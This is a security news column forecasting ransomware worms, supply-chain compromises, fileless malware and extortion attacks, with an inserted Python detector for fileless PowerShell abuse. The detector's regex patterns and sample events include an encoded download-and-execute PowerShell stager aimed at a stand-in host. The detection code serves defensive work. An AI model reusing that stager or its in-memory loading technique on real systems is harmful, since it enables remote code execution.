Brace for Hybrid Threats and Extortion-Fueled Attacks Next Year

There’s no end in sight for ransomware and, based on what we’ve seen this year, these threats will become even more aggressive. Worse still, hackers have started incorporating extortion into other types of attacks.

Ransomware pushers have had their sights on businesses for a couple of years now. But recent outbreaks including WannaCry, NotPetya and BadRabbit have pushed risk to a whole new level, from paying a few thousand dollars to recover some important data to potentially suffering hundreds of millions in losses due to crippled systems and major operational downtimes.

Last month, pharmaceutical giant Merck reported that NotPetya cost the company $300 million in the third quarter due to lost sales and expenses resulting from forced production shutdowns. The company expects a similar impact to its Q4 financial results.

FedEx and logistics conglomerate Maersk also estimated $300 million in losses each after NotPetya disrupted their operations. In the UK, some clinics, hospitals and other National Health Service (NHS) trusts hit by WannaCry needed a week or more to fully recover, delaying appointments and putting patient health at risk.

What WannaCry, NotPetya and BadRabbit had in common is that all of them automatically spread through private networks by exploiting known vulnerabilities in common Windows services or by brute-forcing weak credentials.

Given the success of these attacks, more and more cybercriminals will add network propagation components to traditional ransomware programs. This will ensure they can infect as many systems as possible and force companies to pay rather than experience prolonged operational downtimes. Welcome to the age of ransomware worms.

Another trend that’s expected to keep growing is the delivery of malware through compromised software update channels. These powerful supply chain attacks are very hard to detect because they exploit the inherent trust between users and vendors and take advantage of the privileges already given to installed software.

The NotPetya outbreak in June began in Ukraine after attackers compromised the updates to an accounting program popular in that country. Then, in August, Kaspersky Lab reported an attack in which hackers added a backdoor to a legitimate update for an enterprise server administration tool developed by NetSarang. A month later, attackers managed to inject malware into official builds of CCleaner, a Windows system optimization tool, infecting 2.2 million computers.

These were just the latest in a string of software supply chain attacks reported this year, most of which targeted businesses. Such compromises will only increase in frequency because malware delivered through compromised updates gets loaded by trusted software directly into a computer’s memory, bypassing application whitelisting and other advanced defenses.

The use of so-called fileless malware, which runs only in memory, doesn’t create files on disk and uses registry entries for persistence, is a trend in itself. A large number of sophisticated attacks used this technique this year to compromise banks, government organizations and other enterprises.

These attacks typically combine malicious payloads with legitimate system administration and penetration testing tools including PowerShell, Mimikatz and Meterpreter. The tools are loaded directly into memory without ever touching the disk, making it very hard for traditional antivirus products to detect their use.
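As an added example (not code from the article), here is a small Python detector that scores process-creation records for the fileless PowerShell pattern described above: encoded commands, hidden-window and policy-bypass flags, download-and-run or in-memory load primitives, and launches from Office parent processes. The event field names and the sample command lines are constructed assumptions.

```python
import base64
import re

# Flags that hide the PowerShell window or skip policy checks.
HIDING_FLAGS = re.compile(r"-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
# -EncodedCommand and its short forms, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Download-and-run or in-memory load primitives, checked in clear and decoded text.
INMEMORY_LOAD = re.compile(r"\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String|Reflection\.Assembly)\b", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload (UTF-16LE in base64) or None."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """List the reasons a process-creation event looks like fileless PowerShell abuse."""
    cmd = ev["cmd"]
    decoded = decode_encoded_command(cmd)
    reasons = []
    if decoded is not None:
        reasons.append("encoded command")
    if HIDING_FLAGS.search(cmd):
        reasons.append("hidden/bypass flags")
    if INMEMORY_LOAD.search(cmd + " " + (decoded or "")):
        reasons.append("download-and-execute or in-memory load")
    if ev["parent"].lower() in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    return reasons

def is_suspicious(ev, threshold=2):
    """Alert only when several indicators combine, so routine admin scripts stay quiet."""
    return len(score_event(ev)) >= threshold

# Constructed sample events (parent process and command line), not real telemetry;
# the second mimics a macro-launched in-memory stager. Field names are assumed.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmd": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"parent": "winword.exe", "cmd": "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16le")).decode()},
    {"parent": "services.exe", "cmd": "powershell.exe -Command \"Get-Service | Out-File C:\\temp\\svc.txt\""},
]
```

The threshold keeps a legitimate `-NoProfile -ExecutionPolicy Bypass` backup script at one indicator and below the alert line, while the Office-spawned, hidden, encoded stager trips four.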

Inspired by the success of ransomware, hackers have also started to incorporate extortion into other types of attacks, such as distributed denial-of-service (DDoS) and data breaches. Many companies have received ransom notes this year from hackers who disrupted their online services or broke into their infrastructures and stole sensitive data.

A high-profile case involved a hacker stealing and later leaking unaired episodes of several HBO shows and a Game of Thrones script. The hacker asked the company for $6 million in Bitcoin, and the company reportedly offered him $250,000 under the guise of a bug bounty to delay the leak.

Last month, it came to light that Uber paid hackers $100,000 in 2016 to keep quiet about gaining access to information of 57 million Uber riders and drivers. And just recently, shipping company Clarkson announced that it’s expecting a leak of customer data after refusing to pay a ransom to hackers who breached its systems.

Extortion-fueled attacks are becoming more and more common, as cybercriminals seem to have found a new method of monetizing data breaches that’s easier than selling the stolen data on the black market, where it might take a while until they find a buyer.

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor’s degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at lucian@constantinsecurity.com or @lconstantin on Twitter. For encrypted email, his PGP key’s fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42
